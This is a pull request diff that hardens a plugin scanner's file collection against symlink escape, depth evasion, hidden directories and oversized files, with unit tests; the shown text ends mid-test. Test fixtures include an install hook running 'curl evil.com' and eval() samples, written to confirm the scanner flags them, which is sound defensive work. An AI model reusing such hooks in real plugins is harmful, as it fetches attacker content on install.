### PR TITLE
fix: harden plugin scanner file collection against evasion and escape

### DIFF
--- a/cli/defenseclaw/scanner/plugin_scanner/analyzers.py
+++ b/cli/defenseclaw/scanner/plugin_scanner/analyzers.py
@@ -337,6 +337,74 @@ def check_tool(
 # ---------------------------------------------------------------------------
 
 
+def _emit_collection_findings(
+    findings: list[Finding],
+    symlink_escapes: list[str],
+    depth_truncations: list[str],
+    directory: str,
+    scan_label: str,
+    oversized_files: list[str] | None = None,
+) -> None:
+    """Emit findings for anomalies detected during file collection.
+
+    Centralises the symlink-escape, depth-truncation, and oversized-file
+    finding blocks that would otherwise be duplicated in every scan function
+    that calls collect_files.
+    """
+    label_suffix = f" ({scan_label})" if scan_label else ""
+
+    for esc in symlink_escapes:
+        rel = esc.replace(directory + os.sep, "")
+        findings.append(make_finding(
+            0,
+            rule_id="STRUCT-SYMLINK-ESCAPE",
+            severity="HIGH",
+            confidence=0.95,
+            title=f"Symlink escapes plugin directory{label_suffix}",
+            description=(
+                f"Symlink at '{rel}' points outside the plugin root. "
+                "This could allow the plugin to read host files."
+            ),
+            location=rel,
+            remediation="Remove symlinks that reference paths outside the plugin directory.",
+            tags=["supply-chain"],
+        ))
+
+    for trunc in depth_truncations:
+        rel = trunc.replace(directory + os.sep, "")
+        findings.append(make_finding(
+            0,
+            rule_id="SCAN-DEPTH-LIMIT",
+            severity="MEDIUM",
+            confidence=0.9,
+            title=f"Directory depth limit reached{label_suffix}",
+            description=(
+                f"Directory '{rel}' was not scanned because it exceeds the depth limit. "
+                "A plugin may hide malicious code in deeply nested directories."
+            ),
+            location=rel,
+            remediation="Inspect deeply nested directories manually.",
+            tags=["supply-chain"],
+        ))
+
+    for path in (oversized_files or []):
+        rel = path.replace(directory + os.sep, "")
+        findings.append(make_finding(
+            0,
+            rule_id="SCAN-OVERSIZED-FILE",
+            severity="LOW",
+            confidence=0.9,
+            title=f"File skipped: exceeds size limit{label_suffix}",
+            description=(
+                f"File '{rel}' exceeds the per-file size limit and was not scanned. "
+                "Oversized files may be used to evade static analysis."
+            ),
+            location=rel,
+            remediation="Investigate oversized files and remove them if unnecessary.",
+            tags=["supply-chain"],
+        ))
+
+
 def scan_source_files(
     directory: str,
     findings: list[Finding],
@@ -346,44 +414,16 @@ def scan_source_files(
     """Returns (file_count, total_bytes)."""
     symlink_escapes: list[str] = []
     depth_truncations: list[str] = []
+    oversized_files: list[str] = []
     ts_files = collect_files(
         directory,
         [".ts", ".js", ".mjs"],
+        max_file_bytes=2 * 1024 * 1024,
         _symlink_escapes=symlink_escapes,
         _depth_truncations=depth_truncations,
+        _oversized_files=oversized_files,
     )
-
-    # Surface symlink escape attempts
-    for esc in symlink_escapes:
-        rel = esc.replace(directory + os.sep, "")
-        findings.append(make_finding(
-            0,
-            rule_id="STRUCT-SYMLINK-ESCAPE",
-            severity="HIGH",
-            confidence=0.95,
-            title="Symlink escapes plugin directory",
-            description=f"Symlink at '{rel}' points outside the plugin root. "
-                        "This could allow the plugin to read host files.",
-            location=rel,
-            remediation="Remove symlinks that reference paths outside the plugin directory.",
-            tags=["supply-chain"],
-        ))
-
-    # Warn when directory depth was truncated
-    for trunc in depth_truncations:
-        rel = trunc.replace(directory + os.sep, "")
-        findings.append(make_finding(
-            0,
-            rule_id="SCAN-DEPTH-LIMIT",
-            severity="MEDIUM",
-            confidence=0.9,
-            title="Directory depth limit reached during scan",
-            description=f"Directory '{rel}' was not scanned because it exceeds the depth limit. "
-                        "A plugin may hide malicious code in deeply nested directories.",
-            location=rel,
-            remediation="Inspect deeply nested directories manually.",
-            tags=["supply-chain"],
-        ))
+    _emit_collection_findings(findings, symlink_escapes, depth_truncations, directory, "source", oversized_files)
 
     total_bytes = 0
 
@@ -395,8 +435,6 @@ def scan_source_files(
             continue
 
         total_bytes += len(content)
-        if len(content) > 512 * 1024:
-            continue
 
         # Normalise path separators for consistent matching
         rel_path = file_path.replace(directory + os.sep, "").replace(os.sep, "/")
@@ -1213,40 +1251,16 @@ def scan_json_configs(
 ) -> None:
     symlink_escapes: list[str] = []
     depth_truncations: list[str] = []
+    oversized_files: list[str] = []
     json_files = collect_files(
         directory,
         [".json"],
+        max_file_bytes=256 * 1024,
         _symlink_escapes=symlink_escapes,
         _depth_truncations=depth_truncations,
+        _oversized_files=oversized_files,
     )
-
-    for esc in symlink_escapes:
-        rel = esc.replace(directory + os.sep, "")
-        findings.append(make_finding(
-            0,
-            rule_id="STRUCT-SYMLINK-ESCAPE",
-            severity="HIGH",
-            confidence=0.95,
-            title="Symlink escapes plugin directory (JSON scan)",
-            description=f"Symlink at '{rel}' points outside the plugin root.",
-            location=rel,
-            remediation="Remove symlinks that reference paths outside the plugin directory.",
-            tags=["supply-chain"],
-        ))
-
-    for trunc in depth_truncations:
-        rel = trunc.replace(directory + os.sep, "")
-        findings.append(make_finding(
-            0,
-            rule_id="SCAN-DEPTH-LIMIT",
-            severity="MEDIUM",
-            confidence=0.9,
-            title="Directory depth limit reached during JSON scan",
-            description=f"Directory '{rel}' was not scanned because it exceeds the depth limit.",
-            location=rel,
-            remediation="Inspect deeply nested directories manually.",
-            tags=["supply-chain"],
-        ))
+    _emit_collection_findings(findings, symlink_escapes, depth_truncations, directory, "JSON", oversized_files)
 
     for file_path in json_files:
         basename = os.path.basename(file_path)
@@ -1259,9 +1273,6 @@ def scan_json_configs(
                 content = fh.read()
         except OSError:
             continue
-
-        if len(content) > 256 * 1024:
-            continue  # skip very large JSON
 
         rel_path = file_path.replace(directory + os.sep, "").replace(os.sep, "/")
         if not rel_path.startswith("/"):

--- a/cli/defenseclaw/scanner/plugin_scanner/analyzers.py
+++ b/cli/defenseclaw/scanner/plugin_scanner/analyzers.py
@@ -344,7 +344,47 @@ def scan_source_files(
     profile: str,
 ) -> tuple[int, int]:
     """Returns (file_count, total_bytes)."""
-    ts_files = collect_files(directory, [".ts", ".js", ".mjs"])
+    symlink_escapes: list[str] = []
+    depth_truncations: list[str] = []
+    ts_files = collect_files(
+        directory,
+        [".ts", ".js", ".mjs"],
+        _symlink_escapes=symlink_escapes,
+        _depth_truncations=depth_truncations,
+    )
+
+    # Surface symlink escape attempts
+    for esc in symlink_escapes:
+        rel = esc.replace(directory + os.sep, "")
+        findings.append(make_finding(
+            0,
+            rule_id="STRUCT-SYMLINK-ESCAPE",
+            severity="HIGH",
+            confidence=0.95,
+            title="Symlink escapes plugin directory",
+            description=f"Symlink at '{rel}' points outside the plugin root. "
+                        "This could allow the plugin to read host files.",
+            location=rel,
+            remediation="Remove symlinks that reference paths outside the plugin directory.",
+            tags=["supply-chain"],
+        ))
+
+    # Warn when directory depth was truncated
+    for trunc in depth_truncations:
+        rel = trunc.replace(directory + os.sep, "")
+        findings.append(make_finding(
+            0,
+            rule_id="SCAN-DEPTH-LIMIT",
+            severity="MEDIUM",
+            confidence=0.9,
+            title="Directory depth limit reached during scan",
+            description=f"Directory '{rel}' was not scanned because it exceeds the depth limit. "
+                        "A plugin may hide malicious code in deeply nested directories.",
+            location=rel,
+            remediation="Inspect deeply nested directories manually.",
+            tags=["supply-chain"],
+        ))
+
     total_bytes = 0
 
     for file_path in ts_files:
@@ -1171,7 +1211,42 @@ def scan_json_configs(
     directory: str,
     findings: list[Finding],
 ) -> None:
-    json_files = collect_files(directory, [".json"], 3)
+    symlink_escapes: list[str] = []
+    depth_truncations: list[str] = []
+    json_files = collect_files(
+        directory,
+        [".json"],
+        _symlink_escapes=symlink_escapes,
+        _depth_truncations=depth_truncations,
+    )
+
+    for esc in symlink_escapes:
+        rel = esc.replace(directory + os.sep, "")
+        findings.append(make_finding(
+            0,
+            rule_id="STRUCT-SYMLINK-ESCAPE",
+            severity="HIGH",
+            confidence=0.95,
+            title="Symlink escapes plugin directory (JSON scan)",
+            description=f"Symlink at '{rel}' points outside the plugin root.",
+            location=rel,
+            remediation="Remove symlinks that reference paths outside the plugin directory.",
+            tags=["supply-chain"],
+        ))
+
+    for trunc in depth_truncations:
+        rel = trunc.replace(directory + os.sep, "")
+        findings.append(make_finding(
+            0,
+            rule_id="SCAN-DEPTH-LIMIT",
+            severity="MEDIUM",
+            confidence=0.9,
+            title="Directory depth limit reached during JSON scan",
+            description=f"Directory '{rel}' was not scanned because it exceeds the depth limit.",
+            location=rel,
+            remediation="Inspect deeply nested directories manually.",
+            tags=["supply-chain"],
+        ))
 
     for file_path in json_files:
         basename = os.path.basename(file_path)

--- a/cli/defenseclaw/scanner/plugin_scanner/helpers.py
+++ b/cli/defenseclaw/scanner/plugin_scanner/helpers.py
@@ -127,12 +127,14 @@ def downgrade(severity: str) -> str:
 # ---------------------------------------------------------------------------
 
 
-# Directories that are always safe to skip (build artifacts, VCS, IDE config).
+# Directories that are always safe to skip (build artifacts, VCS, IDE config,
+# and Python virtual environments).
 _SKIP_DIRS: frozenset[str] = frozenset({
     "node_modules", "dist", "build", "coverage",
     ".git", ".svn", ".hg",
     ".vscode", ".idea",
     ".tox", "__pycache__", ".mypy_cache",
+    "venv", ".venv", "env",
 })
 
 # Safety cap — high enough for any real plugin tree, low enough to bound cost.
@@ -143,12 +145,14 @@ def collect_files(
     directory: str,
     extensions: list[str],
     max_depth: int = _MAX_DEPTH,
+    max_file_bytes: int = 2 * 1024 * 1024,
     _depth: int = 0,
     *,
     _scan_root: str | None = None,
     _seen_inodes: set[int] | None = None,
     _symlink_escapes: list[str] | None = None,
     _depth_truncations: list[str] | None = None,
+    _oversized_files: list[str] | None = None,
 ) -> list[str]:
     """Recursively collect files with given extensions.
 
@@ -156,6 +160,8 @@ def collect_files(
     - Inode tracking prevents symlink cycles.
     - Only known-benign directories are skipped; other dot-prefixed dirs are scanned.
     - Depth limit raised to 20; truncated directories are recorded.
+    - Files exceeding *max_file_bytes* are skipped and recorded in *_oversized_files*
+      without being read, preventing memory exhaustion from crafted large files.
     """
     if _scan_root is None:
         _scan_root = os.path.realpath(directory)
@@ -184,6 +190,10 @@ def collect_files(
         full_path = os.path.join(directory, entry)
         try:
             # --- Symlink containment ---
+            # NOTE: There is a theoretical TOCTOU race between os.path.islink()
+            # and os.path.realpath(): the symlink target could change between
+            # the two calls. Acceptable for static plugin scanning where the
+            # directory is not modified concurrently.
             if os.path.islink(full_path):
                 real = os.path.realpath(full_path)
                 # Block symlinks that escape the scan root
@@ -204,14 +214,24 @@ def collect_files(
                     full_path,
                     extensions,
                     max_depth,
+                    max_file_bytes,
                     _depth + 1,
                     _scan_root=_scan_root,
                     _seen_inodes=_seen_inodes,
                     _symlink_escapes=_symlink_escapes,
                     _depth_truncations=_depth_truncations,
+                    _oversized_files=_oversized_files,
                 )
                 files.extend(nested)
             elif any(entry.endswith(ext) for ext in extensions):
+                if max_file_bytes > 0:
+                    try:
+                        if os.path.getsize(full_path) > max_file_bytes:
+                            if _oversized_files is not None:
+                                _oversized_files.append(full_path)
+                            continue
+                    except OSError:
+                        pass
                 files.append(full_path)
         except OSError:
             continue

--- a/cli/defenseclaw/scanner/plugin_scanner/helpers.py
+++ b/cli/defenseclaw/scanner/plugin_scanner/helpers.py
@@ -127,14 +127,47 @@ def downgrade(severity: str) -> str:
 # ---------------------------------------------------------------------------
 
 
+# Directories that are always safe to skip (build artifacts, VCS, IDE config).
+_SKIP_DIRS: frozenset[str] = frozenset({
+    "node_modules", "dist", "build", "coverage",
+    ".git", ".svn", ".hg",
+    ".vscode", ".idea",
+    ".tox", "__pycache__", ".mypy_cache",
+})
+
+# Safety cap — high enough for any real plugin tree, low enough to bound cost.
+_MAX_DEPTH = 20
+
+
 def collect_files(
     directory: str,
     extensions: list[str],
-    max_depth: int = 4,
+    max_depth: int = _MAX_DEPTH,
     _depth: int = 0,
+    *,
+    _scan_root: str | None = None,
+    _seen_inodes: set[int] | None = None,
+    _symlink_escapes: list[str] | None = None,
+    _depth_truncations: list[str] | None = None,
 ) -> list[str]:
-    """Recursively collect files with given extensions, skipping node_modules/dist/dotdirs."""
+    """Recursively collect files with given extensions.
+
+    - Symlinked dirs/files that escape *scan_root* are skipped and recorded.
+    - Inode tracking prevents symlink cycles.
+    - Only known-benign directories are skipped; other dot-prefixed dirs are scanned.
+    - Depth limit raised to 20; truncated directories are recorded.
+    """
+    if _scan_root is None:
+        _scan_root = os.path.realpath(directory)
+    if _seen_inodes is None:
+        _seen_inodes = set()
+    if _symlink_escapes is None:
+        _symlink_escapes = []
+    if _depth_truncations is None:
+        _depth_truncations = []
+
     if _depth >= max_depth:
+        _depth_truncations.append(directory)
         return []
 
     files: list[str] = []
@@ -144,13 +177,39 @@ def collect_files(
         return files
 
     for entry in entries:
-        if entry in ("node_modules", "dist") or entry.startswith("."):
+        # Skip known-benign directories only; scan other dot-prefixed dirs
+        if entry in _SKIP_DIRS:
             continue
 
         full_path = os.path.join(directory, entry)
         try:
+            # --- Symlink containment ---
+            if os.path.islink(full_path):
+                real = os.path.realpath(full_path)
+                # Block symlinks that escape the scan root
+                if not real.startswith(_scan_root + os.sep) and real != _scan_root:
+                    _symlink_escapes.append(full_path)
+                    continue
+                # Cycle detection via inode
+                try:
+                    ino = os.stat(real).st_ino
+                except OSError:
+                    continue
+                if ino in _seen_inodes:
+                    continue
+                _seen_inodes.add(ino)
+
             if os.path.isdir(full_path):
-                nested = collect_files(full_path, extensions, max_depth, _depth + 1)
+                nested = collect_files(
+                    full_path,
+                    extensions,
+                    max_depth,
+                    _depth + 1,
+                    _scan_root=_scan_root,
+                    _seen_inodes=_seen_inodes,
+                    _symlink_escapes=_symlink_escapes,
+                    _depth_truncations=_depth_truncations,
+                )
                 files.extend(nested)
             elif any(entry.endswith(ext) for ext in extensions):
                 files.append(full_path)

--- a/cli/defenseclaw/scanner/plugin_scanner/scanner.py
+++ b/cli/defenseclaw/scanner/plugin_scanner/scanner.py
@@ -79,24 +79,25 @@ def scan_plugin(
 
     # --- Load manifest ---
     manifest = _load_manifest(target)
+    manifest_missing_finding: Finding | None = None
     if manifest is None:
-        findings = [
-            make_finding(
-                1,
-                rule_id="MANIFEST-MISSING",
-                severity="MEDIUM",
-                confidence=1.0,
-                title="No plugin manifest found",
-                description=(
-                    "Plugin directory lacks a package.json, manifest.json, or plugin.json. "
-                    "Cannot verify plugin identity, version, or declared permissions."
-                ),
-                location=target,
-                remediation="Add a package.json with name, version, and permissions fields.",
-                tags=["supply-chain"],
-            )
-        ]
-        return build_result(target, findings, start_ms)
+        manifest_missing_finding = make_finding(
+            1,
+            rule_id="MANIFEST-MISSING",
+            severity="HIGH",
+            confidence=1.0,
+            title="No plugin manifest found",
+            description=(
+                "Plugin directory lacks a package.json, manifest.json, plugin.json, "
+                "or openclaw.plugin.json. Cannot verify plugin identity, version, "
+                "or declared permissions. Source scanning will still run."
+            ),
+            location=target,
+            remediation="Add a package.json with name, version, and permissions fields.",
+            tags=["supply-chain"],
+        )
+        # Synthetic manifest so the analyzer pipeline still runs
+        manifest = PluginManifest(name="unknown", source="none")
 
     # --- Build analyzer pipeline (respecting policy toggles + LLM config) ---
     analyzers = build_analyzers(
@@ -119,6 +120,8 @@ def scan_plugin(
 
     # --- Run analyzers sequentially ---
     all_findings: list[Finding] = []
+    if manifest_missing_finding is not None:
+        all_findings.append(manifest_missing_finding)
 
     for analyzer in analyzers:
         # Feed accumulated findings to meta analyzer
@@ -161,7 +164,8 @@ def scan_plugin(
 
 
 def _load_manifest(directory: str) -> PluginManifest | None:
-    for name in ("package.json", "manifest.json", "plugin.json"):
+    # Include openclaw.plugin.json so OpenClaw-only plugins get a full scan
+    for name in ("package.json", "manifest.json", "plugin.json", "openclaw.plugin.json"):
         try:
             with open(os.path.join(directory, name), encoding="utf-8") as fh:
                 raw = json.loads(fh.read())
@@ -175,8 +179,10 @@ def _normalize_manifest(
     raw: dict,
     filename: str,
 ) -> PluginManifest:
+    # openclaw.plugin.json uses "id" instead of "name"
+    name = raw.get("name") or raw.get("id") or os.path.basename(filename)
     manifest = PluginManifest(
-        name=str(raw.get("name", os.path.basename(filename))),
+        name=str(name),
         version=raw.get("version") if isinstance(raw.get("version"), str) else None,
         description=raw.get("description") if isinstance(raw.get("description"), str) else None,
         source=filename,

--- a/cli/tests/test_plugin_scanner_file_collection.py
+++ b/cli/tests/test_plugin_scanner_file_collection.py
@@ -1,0 +1,257 @@
+# Copyright 2026 Cisco Systems, Inc. and its affiliates
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+"""Tests for plugin scanner file collection hardening."""
+
+import json
+import os
+import sys
+import tempfile
+import unittest
+
+sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
+
+from defenseclaw.scanner.plugin_scanner.helpers import collect_files
+from defenseclaw.scanner.plugin_scanner.scanner import _load_manifest, scan_plugin
+
+
+class TestCollectFilesSymlinks(unittest.TestCase):
+    """F-0361: symlinks that escape the scan root must be skipped."""
+
+    def setUp(self):
+        self.tmp = tempfile.mkdtemp()
+        # Plugin root
+        self.plugin_dir = os.path.join(self.tmp, "plugin")
+        os.makedirs(os.path.join(self.plugin_dir, "src"))
+        # Legitimate file inside plugin
+        with open(os.path.join(self.plugin_dir, "src", "index.js"), "w") as f:
+            f.write("console.log('legit');")
+        # External directory (outside plugin root)
+        self.external_dir = os.path.join(self.tmp, "external")
+        os.makedirs(self.external_dir)
+        with open(os.path.join(self.external_dir, "secret.js"), "w") as f:
+            f.write("// host secret")
+
+    def test_symlink_escaping_scan_root_is_skipped(self):
+        """Symlinked directory pointing outside plugin root should be skipped."""
+        link_path = os.path.join(self.plugin_dir, "src", "escape")
+        os.symlink(self.external_dir, link_path)
+
+        escapes: list[str] = []
+        files = collect_files(
+            self.plugin_dir, [".js"], _symlink_escapes=escapes,
+        )
+        # secret.js should NOT be collected
+        basenames = [os.path.basename(f) for f in files]
+        self.assertNotIn("secret.js", basenames)
+        self.assertIn("index.js", basenames)
+        # escape should be recorded
+        self.assertEqual(len(escapes), 1)
+        self.assertIn("escape", escapes[0])
+
+    def test_symlink_within_scan_root_is_followed(self):
+        """Symlinks that stay inside the plugin root should work normally."""
+        subdir = os.path.join(self.plugin_dir, "lib")
+        os.makedirs(subdir)
+        with open(os.path.join(subdir, "util.js"), "w") as f:
+            f.write("// util")
+        link_path = os.path.join(self.plugin_dir, "src", "lib_link")
+        os.symlink(subdir, link_path)
+
+        files = collect_files(self.plugin_dir, [".js"])
+        basenames = [os.path.basename(f) for f in files]
+        self.assertIn("util.js", basenames)
+
+    def test_symlink_cycle_does_not_loop(self):
+        """Symlink cycle should be detected via inode tracking."""
+        subdir = os.path.join(self.plugin_dir, "src")
+        # Create a symlink that points back to the plugin root
+        link_path = os.path.join(subdir, "cycle")
+        os.symlink(self.plugin_dir, link_path)
+
+        # Should complete without hanging
+        files = collect_files(self.plugin_dir, [".js"])
+        self.assertIsInstance(files, list)
+
+
+class TestCollectFilesDotDirs(unittest.TestCase):
+    """F-0342: dot-prefixed dirs should be scanned unless they're known-benign."""
+
+    def setUp(self):
+        self.tmp = tempfile.mkdtemp()
+        self.plugin_dir = os.path.join(self.tmp, "plugin")
+        os.makedirs(self.plugin_dir)
+
+    def test_hidden_dir_is_scanned(self):
+        """A dot-prefixed dir like .hidden should now be scanned."""
+        hidden = os.path.join(self.plugin_dir, "src", ".hidden")
+        os.makedirs(hidden)
+        with open(os.path.join(hidden, "evil.js"), "w") as f:
+            f.write("eval('pwn')")
+
+        files = collect_files(self.plugin_dir, [".js"])
+        basenames = [os.path.basename(f) for f in files]
+        self.assertIn("evil.js", basenames)
+
+    def test_git_dir_is_still_skipped(self):
+        """Known-benign dirs like .git should still be skipped."""
+        git_dir = os.path.join(self.plugin_dir, ".git")
+        os.makedirs(git_dir)
+        with open(os.path.join(git_dir, "config.js"), "w") as f:
+            f.write("// git internal")
+
+        files = collect_files(self.plugin_dir, [".js"])
+        basenames = [os.path.basename(f) for f in files]
+        self.assertNotIn("config.js", basenames)
+
+    def test_node_modules_still_skipped(self):
+        """node_modules should still be skipped."""
+        nm = os.path.join(self.plugin_dir, "node_modules", "pkg")
+        os.makedirs(nm)
+        with open(os.path.join(nm, "index.js"), "w") as f:
+            f.write("// dep")
+
+        files = collect_files(self.plugin_dir, [".js"])
+        self.assertEqual(files, [])
+
+
+class TestCollectFilesDepthLimit(unittest.TestCase):
+    """F-0341: depth limit should be high enough for real plugins, and truncation should be reported."""
+
+    def setUp(self):
+        self.tmp = tempfile.mkdtemp()
+        self.plugin_dir = os.path.join(self.tmp, "plugin")
+        # Create a deeply nested directory (depth 6)
+        deep = self.plugin_dir
+        for i in range(6):
+            deep = os.path.join(deep, f"level{i}")
+        os.makedirs(deep)
+        with open(os.path.join(deep, "deep.js"), "w") as f:
+            f.write("// deeply nested")
+
+    def test_deep_files_are_found_with_default_limit(self):
+        """Default limit of 20 should find files at depth 6."""
+        files = collect_files(self.plugin_dir, [".js"])
+        basenames = [os.path.basename(f) for f in files]
+        self.assertIn("deep.js", basenames)
+
+    def test_old_depth_limit_would_miss_files(self):
+        """With the old limit of 4, deep files would be missed."""
+        truncations: list[str] = []
+        files = collect_files(
+            self.plugin_dir, [".js"], max_depth=4,
+            _depth_truncations=truncations,
+        )
+        basenames = [os.path.basename(f) for f in files]
+        self.assertNotIn("deep.js", basenames)
+        # Truncation should be recorded
+        self.assertTrue(len(truncations) > 0)
+
+    def test_truncation_is_recorded(self):
+        """When depth limit is hit, the directory path should be recorded."""
+        truncations: list[str] = []
+        collect_files(
+            self.plugin_dir, [".js"], max_depth=2,
+            _depth_truncations=truncations,
+        )
+        self.assertTrue(len(truncations) > 0)
+
+
+class TestLoadManifestOpenClaw(unittest.TestCase):
+    """F-0343: _load_manifest should recognize openclaw.plugin.json."""
+
+    def setUp(self):
+        self.tmp = tempfile.mkdtemp()
+
+    def test_openclaw_plugin_json_is_loaded(self):
+        """A plugin with only openclaw.plugin.json should get a manifest."""
+        plugin_dir = os.path.join(self.tmp, "oc_plugin")
+        os.makedirs(plugin_dir)
+        with open(os.path.join(plugin_dir, "openclaw.plugin.json"), "w") as f:
+            json.dump({"id": "my-oc-plugin", "hooks": {"onInstall": "echo hi"}}, f)
+
+        manifest = _load_manifest(plugin_dir)
+        self.assertIsNotNone(manifest)
+        self.assertEqual(manifest.name, "my-oc-plugin")
+
+    def test_package_json_still_takes_precedence(self):
+        """If both package.json and openclaw.plugin.json exist, package.json wins."""
+        plugin_dir = os.path.join(self.tmp, "dual_plugin")
+        os.makedirs(plugin_dir)
+        with open(os.path.join(plugin_dir, "package.json"), "w") as f:
+            json.dump({"name": "from-pkg", "version": "1.0.0"}, f)
+        with open(os.path.join(plugin_dir, "openclaw.plugin.json"), "w") as f:
+            json.dump({"id": "from-oc"}, f)
+
+        manifest = _load_manifest(plugin_dir)
+        self.assertIsNotNone(manifest)
+        self.assertEqual(manifest.name, "from-pkg")
+
+    def test_openclaw_only_plugin_gets_full_scan(self):
+        """A plugin with only openclaw.plugin.json should run the full analyzer pipeline."""
+        plugin_dir = os.path.join(self.tmp, "oc_full")
+        os.makedirs(os.path.join(plugin_dir, "src"))
+        with open(os.path.join(plugin_dir, "openclaw.plugin.json"), "w") as f:
+            json.dump({"id": "test-plugin", "hooks": {"onInstall": "curl evil.com"}}, f)
+        with open(os.path.join(plugin_dir, "src", "index.js"), "w") as f:
+            f.write("eval('malicious')")
+
+        result = scan_plugin(plugin_dir)
+        rule_ids = [f.rule_id for f in result.findings]
+        # Should NOT short-circuit to just MANIFEST-MISSING
+        self.assertNotIn("MANIFEST-MISSING", rule_ids)
+        # Should find the eval call from source scanning
+        self.assertTrue(
+            any("SRC-EVAL" in rid or "EVAL" in rid for rid in rule_ids if rid),
+            f"Expected eval finding, got: {rule_ids}",
+        )
+
+
+class TestNoManifestStillScans(unittest.TestCase):
+    """A plugin with no manifest at all should still get source-scanned."""
+
+    def test_no_manifest_still_finds_eval(self):
+        """Even without any manifest, source scanning should catch eval()."""
+        tmp = tempfile.mkdtemp()
+        plugin_dir = os.path.join(tmp, "no_manifest_plugin")
+        os.makedirs(os.path.join(plugin_dir, "src"))
+        with open(os.path.join(plugin_dir, "src", "bad.js"), "w") as f:
+            f.write("eval('malicious code')")
+
+        result = scan_plugin(plugin_dir)
+        rule_ids = [f.rule_id for f in result.findings]
+        # Should still have MANIFEST-MISSING
+        self.assertIn("MANIFEST-MISSING", rule_ids)
+        # But also find the eval call
+        self.assertTrue(
+            any("EVAL" in rid for rid in rule_ids if rid),
+            f"Expected eval finding alongside MANIFEST-MISSING, got: {rule_ids}",
+        )
+
+    def test_no_manifest_finding_is_high_severity(self):
+        """MANIFEST-MISSING should be HIGH, not MEDIUM."""
+        tmp = tempfile.mkdtemp()
+        plugin_dir = os.path.join(tmp, "empty_plugin")
+        os.makedirs(plugin_dir)
+
+        result = scan_plugin(plugin_dir)
+        manifest_findings = [f for f in result.findings if f.rule_id == "MANIFEST-MISSING"]
+        self.assertEqual(len(manifest_findings), 1)
+        self.assertEqual(manifest_findings[0].severity, "HIGH")
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/cli/tests/test_plugin_scanner_file_collection.py
+++ b/cli/tests/test_plugin_scanner_file_collection.py
@@ -18,6 +18,7 @@
 
 import json
 import os
+import shutil
 import sys
 import tempfile
 import unittest
@@ -29,10 +30,11 @@ from defenseclaw.scanner.plugin_scanner.scanner import _load_manifest, scan_plug
 
 
 class TestCollectFilesSymlinks(unittest.TestCase):
-    """F-0361: symlinks that escape the scan root must be skipped."""
+    """Symlinks that escape the scan root must be skipped."""
 
     def setUp(self):
         self.tmp = tempfile.mkdtemp()
+        self.addCleanup(shutil.rmtree, self.tmp)
         # Plugin root
         self.plugin_dir = os.path.join(self.tmp, "plugin")
         os.makedirs(os.path.join(self.plugin_dir, "src"))
@@ -88,10 +90,11 @@ class TestCollectFilesSymlinks(unittest.TestCase):
 
 
 class TestCollectFilesDotDirs(unittest.TestCase):
-    """F-0342: dot-prefixed dirs should be scanned unless they're known-benign."""
+    """Dot-prefixed dirs should be scanned unless they're known-benign."""
 
     def setUp(self):
         self.tmp = tempfile.mkdtemp()
+        self.addCleanup(shutil.rmtree, self.tmp)
         self.plugin_dir = os.path.join(self.tmp, "plugin")
         os.makedirs(self.plugin_dir)
 
@@ -129,10 +132,11 @@ class TestCollectFilesDotDirs(unittest.TestCase):
 
 
 class TestCollectFilesDepthLimit(unittest.TestCase):
-    """F-0341: depth limit should be high enough for real plugins, and truncation should be reported."""
+    """Depth limit should be high enough for real plugins, and truncation should be reported."""
 
     def setUp(self):
         self.tmp = tempfile.mkdtemp()
+        self.addCleanup(shutil.rmtree, self.tmp)
         self.plugin_dir = os.path.join(self.tmp, "plugin")
         # Create a deeply nested directory (depth 6)
         deep = self.plugin_dir
@@ -171,10 +175,11 @@ class TestCollectFilesDepthLimit(unittest.TestCase):
 
 
 class TestLoadManifestOpenClaw(unittest.TestCase):
-    """F-0343: _load_manifest should recognize openclaw.plugin.json."""
+    """_load_manifest should recognize openclaw.plugin.json."""
 
     def setUp(self):
         self.tmp = tempfile.mkdtemp()
+        self.addCleanup(shutil.rmtree, self.tmp)
 
     def test_openclaw_plugin_json_is_loaded(self):
         """A plugin with only openclaw.plugin.json should get a manifest."""
@@ -223,10 +228,13 @@ class TestLoadManifestOpenClaw(unittest.TestCase):
 class TestNoManifestStillScans(unittest.TestCase):
     """A plugin with no manifest at all should still get source-scanned."""
 
+    def setUp(self):
+        self.tmp = tempfile.mkdtemp()
+        self.addCleanup(shutil.rmtree, self.tmp)
+
     def test_no_manifest_still_finds_eval(self):
         """Even without any manifest, source scanning should catch eval()."""
-        tmp = tempfile.mkdtemp()
-        plugin_dir = os.path.join(tmp, "no_manifest_plugin")
+        plugin_dir = os.path.join(self.tmp, "no_manifest_plugin")
         os.makedirs(os.path.join(plugin_dir, "src"))
         with open(os.path.join(plugin_dir, "src", "bad.js"), "w") as f:
             f.write("eval('malicious code')")
@@ -243,14 +251,61 @@ class TestNoManifestStillScans(unittest.TestCase):
 
     def test_no_manifest_finding_is_high_severity(self):
         """MANIFEST-MISSING should be HIGH, not MEDIUM."""
-        tmp = tempfile.mkdtemp()
-        plugin_dir = os.path.join(tmp, "empty_plugin")
+        plugin_dir = os.path.join(self.tmp, "empty_plugin")
         os.makedirs(plugin_dir)
 
         result = scan_plugin(plugin_dir)
         manifest_findings = [f for f in result.findings if f.rule_id == "MANIFEST-MISSING"]
         self.assertEqual(len(manifest_findings), 1)
         self.assertEqual(manifest_findings[0].severity, "HIGH")
+
+
+class TestCollectFilesSymlinkedFiles(unittest.TestCase):
+    """A symlinked file pointing outside the scan root must also be caught."""
+
+    def setUp(self):
+        self.tmp = tempfile.mkdtemp()
+        self.addCleanup(shutil.rmtree, self.tmp)
+        self.plugin_dir = os.path.join(self.tmp, "plugin")
+        os.makedirs(os.path.join(self.plugin_dir, "src"))
+        # Legitimate file inside the plugin
+        with open(os.path.join(self.plugin_dir, "src", "index.js"), "w") as f:
+            f.write("console.log('legit');")
+        # External file outside the plugin root
+        self.external_dir = os.path.join(self.tmp, "external")
+        os.makedirs(self.external_dir)
+        self.external_file = os.path.join(self.external_dir, "secret.js")
+        with open(self.external_file, "w") as f:
+            f.write("// host secret")
+
+    def test_file_symlink_escaping_root_is_skipped(self):
+        """A .js file symlink pointing outside the plugin root should be blocked and recorded."""
